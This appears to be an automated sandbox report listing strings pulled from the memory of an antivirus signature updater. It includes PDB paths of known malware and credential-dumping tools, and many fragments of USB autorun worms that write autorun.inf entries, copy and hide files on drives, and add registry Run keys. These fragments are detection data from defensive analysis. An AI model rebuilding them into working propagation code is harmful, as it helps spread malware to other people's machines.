Source:	Binary string: \ValhallaCrypter\ValhallaStub\Debug\ValhallaStub.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: \Release\shellcode.pdbxB source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: PCHunter64.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processtopology-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: rasautou.pdb0 source: MpSigStub.exe, 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp
Source:	Binary string: samlib.pdb source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: csgoInjector.pdbx source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: MsMpEngCP.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdbx source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: DebugRelease\Form1.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: ntoskrnl.pdb source: MpSigStub.exe, 00000026.00000003.18308141829.00000138BCCD6000.00000004.00000001.sdmp
Source:	Binary string: SAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: MpAdlStub.pdbGCTL source: mpam-25cd2963.exe, 00000025.00000000.18201763876.00007FF7202FF000.00000002.00020000.sdmp
Source:	Binary string: feclient.pdb source: MpSigStub.exe, 00000026.00000003.18332439507.00000138BD299000.00000004.00000001.sdmp
Source:	Binary string: \regentry.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: \ircBot\ircBot\obj\Release\LolCache.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: Release\NTDSDumpEx.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: \bd2\master\bin\x64\Debug\bd2.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: blackbox.pdbyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy source: MpSigStub.exe, 00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp
Source:	Binary string: \CCC\obj\Debug\CCC.pdbx source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: /dQWPICl_Hude1v.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: PasswordFox.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: \GG-Ransomware-master\GG ransomware\GG ransomware\obj\Debug\Ransom.pdb] source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp
Source:	Binary string: SuzanDLL\Release\suzanw.pdbx source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \myservice_chrome_svc.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: winsta.pdb source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: 'C:\postmaster\merge\Peasants\Billy.pdb source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: kill\yourself\@YongruiTan\chinese\idiot.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: U,.+:\\src\\tcrypt\\Release\\s_(high\|low).pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \Deonan\Release\Deonan.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: :\VC5\release\kinject.dll.pdb source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp
Source:	Binary string: BTR.pdb source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: userenv.pdb3 source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-2-0.pdb source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: ApplyUpdate.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: C:\projects\FinalInstaller\finalinstaller\FinalInstaller\obj\imali_release\FinalInstaller_dotnet4.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: Elevated_MpMiniSigStub.pdb source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp
Source:	Binary string: \SharPersist.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \Release\Skype Utility.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: WizzByPass.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: iwJL##$@#*$^#%@!^$.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: CustomPlayback*\\Release\\CustomPlayback\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: Corona.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: tkDecript.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: d:\Autobuild\Work\BrowserExtensions\src\NSISCouponsPlugin\bin\Win32\Release\NSISCouponsPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: C:\\Git\\[a-z]([a-z]{3,10})\\.{0,20}(Debug\|Release).{0,20}\\[A-Z]\1(Exe\|Dll)\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: Release\TeamViewer.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: \Razvan\Desktop\Oh yeah\photo\photo\obj\Debug\leagueoflegends.pdb source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp
Source:	Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: <Projects\CreateMessage\TestMessage\obj\Debug\ivtExchange.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp

Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: \autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: line1 = "[autorun]" && line2 = "open = System\DriveGuard\DriveProtect.exe -run
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: filesetattrib, -RASH, %thsdrv%\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: *filesetattrib, -RASH, %thsdrv%\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: copy/b%systemroot%\system32\autorun.cmd.echo[autorun]>autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: copy/b%systemroot%\system32\autorun.cmd.echo[autorun]>autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: Ecopy/b%systemroot%\system32\autorun.cmd.echo[autorun]>autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: Ecopy/b%systemroot%\system32\autorun.cmd.echo[autorun]>autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	Binary or memory string: autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	Binary or memory string: autorun.infx
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	Binary or memory string: [autorun];
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	Binary or memory string: x7[autorun];
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	Binary or memory string: %windir%\system32\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: :\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: [autorun]Open = action=Abrir carpeta para ver archivos
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: I[autorun]
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: [Autorun]
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: \Autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	Binary or memory string: [autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	Binary or memory string: /[autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	Binary or memory string: X:\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	Binary or memory string: .vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	Binary or memory string: /cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	Binary or memory string: +/cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	Binary or memory string: -[autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	Binary or memory string: copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	Binary or memory string: 8copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: cmd /c del /a autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: cmd /c del /a autorun.inf]
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: c:\windows\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	Binary or memory string: >> autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	Binary or memory string: .exe -h -s -r autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	Binary or memory string: shell\open=Open >> autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: [autorun]@#Open=tool.exe@#Shellexecute=tool.exe@#Shell
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: 6[autorun]@#Open=tool.exe@#Shellexecute=tool.exe@#Shell
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: [autorun]]
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: c:\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: shell\install\command=foto.exe>>%co%autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: 1shell\install\command=foto.exe>>%co%autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: in(cdefghijklmnopqrstuvwxyz)doxcopy/h/y/r/kautorun.inf%%
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=shell\open=(&o)shell\open\command=s-
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: f[autorun]open=shell\open=(&o)shell\open\command=s-
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: (/c echo [autorun] >>
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: AutoRun.infd
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: AutoRun.infd2Program Files\Common Files\Microsoft Shared\MSINFO
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	Binary or memory string: %windir%\system32\win.dll\reg.bkp\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: [autorun]shell\open\command=d:\systemvolumeinformation.exeshell\explore\command=d:\systemvolumeinformation.exe
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: p[autorun]shell\open\command=d:\systemvolumeinformation.exeshell\explore\command=d:\systemvolumeinformation.exe
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=service.exeshell\open=(&o)shell\open\command=service.exeshell\open\default=1shell\explore=(&x)shell\explore\command=service.exe
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: :\autorun.infopenAutoRun]
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: [autorun]shellexecute=speedkill3.vbsaction=icon=1.icolabel=flesh
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: B[autorun]shellexecute=speedkill3.vbsaction=icon=1.icolabel=flesh
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: 'kill_del(, a_loopfield ":\autorun.inf")
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: %TsDv%\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: [autorun]ACTION=Open USB Driveopen=
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: filesetattrib, +RASH, %TsDv%\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: %A_LoopField%:\AutoRun.inf
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: AUTORUN.INF
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: [AUTORUN]
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: AUTORUN.INF[AUTORUN]
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: AUTORUN.INF[AUTORUN]
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: C:\TEMP\\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: C:\TEMP\\autorun.inf]
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: v[autorun];
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: %sautorun.inf
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: deviceid&"\cysset.exe","-a+hsr")$file=fileopen($objevent.targetinstance.deviceid&"\autorun.inf"
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: adeviceid&"\cysset.exe","-a+hsr")$file=fileopen($objevent.targetinstance.deviceid&"\autorun.inf"
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: :\Autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	Binary or memory string: ;<br/>[autorun]<br/>open=terserah.exe<br/>shellexecute=terserah.exe<br/>action=openfoldert
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	Binary or memory string: t;<br/>[autorun]<br/>open=terserah.exe<br/>shellexecute=terserah.exe<br/>action=openfoldert
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: %s\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: AutoRun.inf
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: AutoRun.inf]
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: setaq=fso.getfile(status)iffso.fileexists(tmpt)thenfso.getfile(tmpt).attributes=0aq.copytmpt,truesetaq=fso.getfile(tmpt)aq.attributes=39anv=tmp+"\auto.exe"ifnotfso.fileexists(anv)thenaq.copyanvsetauto=fso.getfile(anv)auto.attributes=0setaut=fso.opentextfile(tmp+an,2,true,0)isi="[autorun]>open=wscript.exe//e:vbscriptthumb.dbauto>shell\open=open>shell\open\command=wscript.exe//e:vbscriptthumb.dbauto>shell\open\default=1>shell\explore=explore>shell\explore\command=wscript.exe//e:vbscriptthumb.dbauto
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: :\AutoRun.inf
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: %c:\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Runkrag%c:\autorun.inf[AutoRun]
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Runkrag%c:\autorun.inf[AutoRun]
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: [Autorun]]
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: [autorun]d$open = autorun.exed4shellexecute = autorun.exed
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	Binary or memory string: [autorun]open=
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: [autorun]]
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: Y[autorun]
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: '[autorun]
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: 3:\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: S[autorun]
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: E[autorun]
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: G[autorun]
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: [autorun]shell\explore\command=
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: D:\Autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: M:\autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: atr="[autorun]"&vbcrlf&"shellexecute=wscript.exe/e:vbs
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: ?atr="[autorun]"&vbcrlf&"shellexecute=wscript.exe/e:vbs
Source: MpSigStub.exe, 00000026.00000003.18308141829.00000138BCCD6000.00000004.00000001.sdmp	Binary or memory string: docopy/yautorun.inf%%x:autorun.inf
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: echo [AutoRun] > %%
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: filesetattrib($var[$i]&"\autorun.inf","-hsr
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: \|filesetattrib($var[$i]&"\autorun.inf","-hsr
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: =fileopen($var[$i]&"\autorun.inf",10)filewrite($
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: ,"[autorun]"&@crlf)
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: [autorun]action=openshellexecute=
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: 0AutoRun.inf
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: 0[AutoRun]
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: \sysautorun.inf
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: \sysautorun.inf]
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: [Autorun]
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: %sAutoRun.inf
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: %s\AutoRun.inf

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B582ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,
